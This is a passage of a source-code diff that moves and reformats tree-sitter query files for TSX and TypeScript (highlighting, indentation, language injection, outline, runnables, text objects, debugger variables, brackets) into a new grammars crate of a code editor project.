-1,6 +1,7 @@ name = "TSX" grammar = "tsx" path_suffixes = ["tsx"] +modeline_aliases = ["typescript-txs"] line_comments = ["// "] block_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } documentation_comment = { start = "/**", prefix = "* ", end = "*/", tab_size = 1 } diff --git a/crates/grammars/src/tsx/debugger.scm b/crates/grammars/src/tsx/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..5a6ab143d0dbed601534cc214bd017fcf5c29a41 --- /dev/null +++ b/crates/grammars/src/tsx/debugger.scm @@ -0,0 +1,55 @@ +(lexical_declaration + (variable_declarator + name: (identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(jsx_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/tsx/highlights.scm b/crates/grammars/src/tsx/highlights.scm similarity index 63% rename from crates/languages/src/tsx/highlights.scm rename to crates/grammars/src/tsx/highlights.scm index a96bf96281fd90a77a3411d1ad909f22c12ac0df..0f203e7112cf14268d0edfed39b5624375d1a859 100644 --- a/crates/languages/src/tsx/highlights.scm +++ b/crates/grammars/src/tsx/highlights.scm @@ -1,56 +1,33 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? - @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? @type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -59,36 +36,58 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? @constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -122,9 +121,10 @@ name: (identifier) @variable.parameter) ; Special identifiers - (type_annotation) @type + (type_identifier) @type + (predefined_type) @type.builtin (type_alias_declaration @@ -153,12 +153,12 @@ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -182,11 +182,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -244,7 +245,8 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) [ "(" @@ -253,21 +255,19 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (ternary_expression [ "?" ":" - ] @operator -) + ] @operator) ; Keywords [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -317,6 +317,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -334,7 +335,8 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) (template_substitution "${" @punctuation.special @@ -352,31 +354,32 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) (union_type - ("|") @punctuation.special) + "|" @punctuation.special) (intersection_type - ("&") @punctuation.special) + "&" @punctuation.special) (type_annotation - (":") @punctuation.special) + ":" @punctuation.special) (index_signature - (":") @punctuation.special) + ":" @punctuation.special) (type_predicate_annotation - (":") @punctuation.special) + ":" @punctuation.special) (public_field_definition - ("?") @punctuation.special) + "?" @punctuation.special) (property_signature - ("?") @punctuation.special) + "?" @punctuation.special) (method_signature - ("?") @punctuation.special) + "?" @punctuation.special) (optional_parameter ([ @@ -384,44 +387,66 @@ ":" ]) @punctuation.special) - - (jsx_opening_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_self_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) - -(jsx_opening_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_self_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) - -(jsx_attribute (property_identifier) @attribute.jsx) -(jsx_opening_element (["<" ">"]) @punctuation.bracket.jsx) -(jsx_closing_element ([""]) @punctuation.bracket.jsx) -(jsx_self_closing_element (["<" "/>"]) @punctuation.bracket.jsx) -(jsx_attribute "=" @punctuation.delimiter.jsx) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + +(jsx_opening_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_self_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_attribute + (property_identifier) @attribute.jsx) + +(jsx_opening_element + ([ + "<" + ">" + ]) @punctuation.bracket.jsx) + +(jsx_closing_element + ([ + "" + ]) @punctuation.bracket.jsx) + +(jsx_self_closing_element + ([ + "<" + "/>" + ]) @punctuation.bracket.jsx) + +(jsx_attribute + "=" @punctuation.delimiter.jsx) + (jsx_text) @text.jsx + (html_character_reference) @string.special diff --git a/crates/grammars/src/tsx/indents.scm b/crates/grammars/src/tsx/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..1e72160bca2f5fd04ce6d3bc7b02e9ab029eb018 --- /dev/null +++ b/crates/grammars/src/tsx/indents.scm @@ -0,0 +1,33 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + (if_statement) + (for_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +(jsx_opening_element + ">" @end) @indent + +(jsx_element + (jsx_opening_element) @start + (jsx_closing_element)? @end) @indent diff --git a/crates/grammars/src/tsx/injections.scm b/crates/grammars/src/tsx/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..fda53263f575238051d325cd5820a285f8f24259 --- /dev/null +++ b/crates/grammars/src/tsx/injections.scm @@ -0,0 +1,145 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? @_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "html"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! injection.language "css")) diff --git a/crates/grammars/src/tsx/outline.scm b/crates/grammars/src/tsx/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..37991965256a0def9b0458958ac4e50c6f337af6 --- /dev/null +++ b/crates/grammars/src/tsx/outline.scm @@ -0,0 +1,275 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(type_alias_declaration + "type" @context + name: (_) @name) @item + +(function_declaration + "async"? @context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Exported array destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Exported object destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +(abstract_class_declaration + "abstract" @context + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/languages/src/tsx/overrides.scm b/crates/grammars/src/tsx/overrides.scm similarity index 50% rename from crates/languages/src/tsx/overrides.scm rename to crates/grammars/src/tsx/overrides.scm index f5a51af33fee340762d6b689e78d2e94e9c84901..759ffe8703ff27f53e5ccadb3eb4687a279f21f8 100644 --- a/crates/languages/src/tsx/overrides.scm +++ b/crates/grammars/src/tsx/overrides.scm @@ -2,7 +2,8 @@ (string) @string -(template_string (string_fragment) @string) +(template_string + (string_fragment) @string) (jsx_element) @element @@ -13,6 +14,7 @@ (jsx_expression) ] @default -(_ value: (call_expression - function: (identifier) @function_name_before_type_arguments - type_arguments: (type_arguments))) +(_ + value: (call_expression + function: (identifier) @function_name_before_type_arguments + type_arguments: (type_arguments))) diff --git a/crates/grammars/src/tsx/runnables.scm b/crates/grammars/src/tsx/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..db1f69a2c22e5a5dbcf7892f6c02158260c764e9 --- /dev/null +++ b/crates/grammars/src/tsx/runnables.scm @@ -0,0 +1,42 @@ +; Add support for (node:test, bun:test and Jest) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) diff --git a/crates/grammars/src/tsx/textobjects.scm b/crates/grammars/src/tsx/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..7a3a4768d94f495f9654d7ba1c182d3f7a47dcb4 --- /dev/null +++ b/crates/grammars/src/tsx/textobjects.scm @@ -0,0 +1,129 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? @function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration (expression body fallback) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) +((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(function_signature) @function.around + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(interface_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(enum_declaration + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(ambient_declaration + (module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}"))) @class.around + +(internal_module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(type_alias_declaration) @class.around diff --git a/crates/grammars/src/typescript/brackets.scm b/crates/grammars/src/typescript/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f6f3a133fbe47abfcf54473beff0c73c04afaf4 --- /dev/null +++ b/crates/grammars/src/typescript/brackets.scm @@ -0,0 +1,23 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/typescript/config.toml b/crates/grammars/src/typescript/config.toml similarity index 96% rename from crates/languages/src/typescript/config.toml rename to crates/grammars/src/typescript/config.toml index 67656e6a538da6c8860e9ab1b08fd6e6ee9cabbd..473a347cdd611d096e5fb3b584c2f0990da185de 100644 --- a/crates/languages/src/typescript/config.toml +++ b/crates/grammars/src/typescript/config.toml @@ -1,6 +1,7 @@ name = "TypeScript" grammar = "typescript" path_suffixes = ["ts", "cts", "mts"] +modeline_aliases = ["ts"] first_line_pattern = '^#!.*\b(?:deno run|ts-node|bun|tsx|[/ ]node)\b' line_comments = ["// "] block_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } @@ -22,7 +23,6 @@ prettier_parser_name = "typescript" tab_size = 2 debuggers = ["JavaScript"] scope_opt_in_language_servers = ["tailwindcss-language-server"] -import_path_strip_regex = "(?:/index)?\\.[jt]s$" [overrides.string] completion_query_characters = ["-", "."] diff --git a/crates/grammars/src/typescript/debugger.scm b/crates/grammars/src/typescript/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8f384fd8ad9e07fea89972464e64b905086bf580 --- /dev/null +++ b/crates/grammars/src/typescript/debugger.scm @@ -0,0 +1,51 @@ +(lexical_declaration + (variable_declarator + name: (identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/typescript/highlights.scm b/crates/grammars/src/typescript/highlights.scm similarity index 61% rename from crates/languages/src/typescript/highlights.scm rename to crates/grammars/src/typescript/highlights.scm index 8ec3ec26cca805c65d68d9df08037102a32494dc..0213adb10f61a4921544f4c758e51312a68ae28d 100644 --- a/crates/languages/src/typescript/highlights.scm +++ b/crates/grammars/src/typescript/highlights.scm @@ -1,46 +1,19 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? - @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? @type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Special identifiers - (type_annotation) @type (type_identifier) @type + (predefined_type) @type.builtin (type_alias_declaration @@ -65,49 +38,47 @@ (implements_clause (type_identifier) @type) -;; Enables ts-pretty-errors -;; The Lsp returns "snippets" of typescript, which are not valid typescript in totality, -;; but should still be highlighted -;; Highlights object literals by hijacking the statement_block pattern, but only if -;; the statement block follows an object literal pattern -((statement_block - (labeled_statement - ;; highlight the label like a property name - label: (statement_identifier) @property.name - body: [ - ;; match a terminating expression statement - (expression_statement - ;; single identifier - treat as a type name - [(identifier) @type.name - ;; object - treat as a property - type pair - (object - (pair - key: (_) @property.name - value: (_) @type.name)) - ;; subscript_expression - treat as an array declaration - (subscript_expression - object: (_) @type.name - index: (_) - ) - ;; templated string - treat each identifier contained as a type name - (template_string - (template_substitution - (identifier) @type.name)) - ]) - ;; match a nested statement block - (statement_block) @nested - ]))) +; Enables ts-pretty-errors +; The Lsp returns "snippets" of typescript, which are not valid typescript in totality, +; but should still be highlighted +; Highlights object literals by hijacking the statement_block pattern, but only if +; the statement block follows an object literal pattern +(statement_block + (labeled_statement + ; highlight the label like a property name + label: (statement_identifier) @property.name + body: [ + ; match a terminating expression statement + (expression_statement + ; single identifier - treat as a type name + [ + (identifier) @type.name + ; object - treat as a property - type pair + (object + (pair + key: (_) @property.name + value: (_) @type.name)) + ; subscript_expression - treat as an array declaration + (subscript_expression + object: (_) @type.name + index: (_)) + ; templated string - treat each identifier contained as a type name + (template_string + (template_substitution + (identifier) @type.name)) + ]) + ; match a nested statement block + (statement_block) @nested + ])) ; Inline type imports: import { type Foo } or import { type Foo as Bar } (import_specifier "type" - name: (identifier) @type -) + name: (identifier) @type) (import_specifier "type" - alias: (identifier) @type -) + alias: (identifier) @type) ; Full type imports: import type { Foo } or import type { Foo as Bar } (import_statement @@ -115,45 +86,41 @@ (import_clause (named_imports (import_specifier - name: (identifier) @type - ) - ) - ) -) + name: (identifier) @type)))) (import_statement "type" (import_clause (named_imports (import_specifier - alias: (identifier) @type - ) - ) - ) -) + alias: (identifier) @type)))) ([ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -162,38 +129,60 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? @constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) (arrow_function) @function ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -227,8 +216,8 @@ name: (identifier) @variable.parameter) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -247,8 +236,7 @@ (undefined) (true) (false) - ] @type.builtin -) + ] @type.builtin) (comment) @comment @@ -263,11 +251,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -326,14 +315,14 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) (ternary_expression [ "?" ":" - ] @operator -) + ] @operator) [ "(" @@ -342,7 +331,7 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (template_substitution "${" @punctuation.special @@ -360,31 +349,32 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) (union_type - ("|") @punctuation.special) + "|" @punctuation.special) (intersection_type - ("&") @punctuation.special) + "&" @punctuation.special) (type_annotation - (":") @punctuation.special) + ":" @punctuation.special) (index_signature - (":") @punctuation.special) + ":" @punctuation.special) (type_predicate_annotation - (":") @punctuation.special) + ":" @punctuation.special) (public_field_definition - ("?") @punctuation.special) + "?" @punctuation.special) (property_signature - ("?") @punctuation.special) + "?" @punctuation.special) (method_signature - ("?") @punctuation.special) + "?" @punctuation.special) (optional_parameter ([ @@ -393,12 +383,10 @@ ]) @punctuation.special) ; Keywords - [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -448,6 +436,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -465,4 +454,5 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) diff --git a/crates/grammars/src/typescript/indents.scm 